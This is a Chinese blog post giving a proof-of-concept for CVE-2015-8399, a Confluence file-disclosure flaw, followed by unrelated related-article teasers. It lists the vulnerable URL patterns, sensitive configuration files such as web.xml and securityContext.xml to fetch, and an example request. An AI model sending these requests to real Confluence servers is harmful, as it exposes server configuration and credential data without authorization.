[CVE-2015-8399]Confluence敏感信息泄露

原創 caiqiiqi 2020-05-09 07:55

影響版本:
5.2 / 5.8.14 / 5.8.15

   [PoC]
        http://<Confluence Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
        http://<Confluence Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

        This is an example of accepted <FILE> parameters
        /WEB-INF/decorators.xml
        /WEB-INF/glue-config.xml
        /WEB-INF/server-config.wsdd
        /WEB-INF/sitemesh.xml
        /WEB-INF/urlrewrite.xml
        /WEB-INF/web.xml
        /databaseSubsystemContext.xml
        /securityContext.xml
        /services/statusServiceContext.xml
        com/atlassian/confluence/security/SpacePermission.hbm.xml
        com/atlassian/confluence/user/OSUUser.hbm.xml
        com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
        com/atlassian/confluence/user/ConfluenceUser.hbm.xml

比如:
http://192.168.85.129:8090/spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml
在這裏插入圖片描述

參考:
https://www.exploit-db.com/exploits/39170

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Java中線程的創建方式

繼承 Thread 類 Thread 類本質上是實現了 Runnable 接口的一個實例,代表一個線程的實例。 啓動線程的唯一方法就是通過 Thread 類的 start()實例方法。 start()方法是一個 native 方法,它將

原創 2024-05-04 21:31:13

Java集合中的Set

Set 有去重的特性,該體系集合用於存儲無序(存入和取出的順序不一定相同)元素,值不能重複。對象的相等性本質是對象hashCode值(java是依據對象的內存地址計算出的此序號)判斷的,如果想要讓兩個不同的對象視爲相等的,就必須覆蓋Obje

原創 2024-05-02 23:34:26

Java中的List

List 是Java中非常常用的數據類型。 List 是有序的 Collection。 Java List 一共三個實現類:分別是 ArrayList、 Vector 和 LinkedList。 ArrayList(數組) Array

原創 2024-05-01 21:31:27

通義靈碼實戰系列:一個新項目如何快速啓動,如何維護遺留系統代碼庫?

作者:別象 進入 2024 年,AI 熱度持續上升,翻閱科技區的文章,AI 可謂是軍書十二卷,卷卷有爺名。而麥肯錫最近的研究報告顯示,軟件工程是 AI 影響最大的領域之一,AI 已經成爲了軟件工程的必選項,也有研究稱開發者每天的事務性工作可

原創 2024-04-30 21:12:20

Apache DolphinScheduler支持Flink嗎?

隨着大數據技術的快速發展,很多企業開始將Flink引入到生產環境中,以滿足日益複雜的數據處理需求。而作爲一款企業級的數據調度平臺,Apache DolphinScheduler也跟上了時代步伐,推出了對Flink任務類型的支持。 Flink

原創 2024-04-30 11:49:27

Spring AI 搶先體驗,5 分鐘玩轉 Java AI 應用開發

作者:劉軍 Spring AI 是 Spring 官方社區項目,旨在簡化 Java AI 應用程序開發,讓 Java 開發者像使用 Spring 開發普通應用一樣開發 AI 應用。 Spring Cloud Alibaba AI 以 Spr

原創 2024-04-29 21:12:12

1 名工程師輕鬆管理 20 個工作流,創業企業用 Serverless 讓數據處理流程提效

作者:嶽洋、陳德全、劉靜娜 北京語勢科技有限公司成立於 2023 年 6 月,語勢科技定位爲“智能投資時代的主題入口”,在資管行業從以機構爲核心轉向以用戶爲核心的變革時代,通過打造主題投資引擎,賦能普惠投資一體化,打造以投資者和資管機構爲主

原創 2024-04-28 21:12:22

哈哈哈哈或

在Java編程中,簡潔高效的實現往往涉及幾個關鍵原則和技能。例如,使用簡單的代碼結構來提高代碼訪問性和可維護性,這意味着代碼應該追求清晰、簡潔且模式匿名,因爲過度模式匿名會導致複雜度增長,影響代碼的維護性和效率。 其中,簡潔高效還包攜

原創 2024-04-28 00:40:41

Java編程工具:簡潔高效實現

Java編程工具:簡潔高效實現Java編程工具:簡潔高效實現Java編程工具:簡潔高效實現

原創 2024-04-27 00:41:09

Java word通過html設置樣式(Spire Docx)

  Java  word通過html設置樣式(Spire Docx) <dependencies>   <!-- Apache POI dependency for Word --> <dependency>

原創 2024-04-26 23:42:09

從零開始學架構V2-初識架構設計-1

一、架構設計的主要目的 爲了解決軟件系統複雜度帶來的問題 二、複雜性來源 軟件的架構設計是一個非常複雜的過程;基於業務&技術現狀、公司成本、團隊規模、團隊技術能力、近三年業務發展規模預測、技術發展趨勢等條件篩選出合適的技術、編寫多種架構設計

原創 2024-04-25 23:56:25

高德地圖爬蟲實踐:Java多線程併發處理策略

背景介紹 高德地圖是一款基於互聯網和移動互聯網的地圖與導航應用,提供了包括地圖瀏覽、公交查詢、駕車導航、步行導航等在內的多種功能。其龐大的用戶羣體和豐富的地圖數據成爲了各行各業進行位置服務、地理信息分析等應用的首選。 爬蟲實踐需求 在

原創 2024-04-25 23:26:44

三十分鐘入門基礎Go(Java小子版)

前言 Go語言定義 Go(又稱 Golang)是 Google 的 Robert Griesemer,Rob Pike 及 Ken Thompson 開發的一種靜態、強類型、編譯型語言。Go 語言語法與 C 相近,但功能上有:內存安

原創 2024-04-25 23:17:43

流水線運行出錯排查難?AI 來幫你

“我的企業有幾千條流水線,每次流水線運行出錯,都要投入不少的技術人員進去排查,需要花費不少的時間。” 遇到這種情況,怎麼解決。在 AI 爆火的今天,AI 如何助力 DevOps 效率提升? 雲效與阿里雲通義大模型合作,推出了流水線智能排查能

原創 2024-04-24 21:12:07

西安站開營!AI 編碼助手通義靈碼幫大學生“整活兒”

如何更好地與 AI 爲伴,做時代的先進開發者?4 月 17 日,阿里雲推出的 AI 編程助手通義靈碼與雲工開物“高校訓練營”走進西安多所高校開啓實操培訓,結合 AI 輔助編程的發展背景、通義靈碼的具體能力和應用實操,幫助在校大學生了解人工智

原創 2024-04-24 21:12:06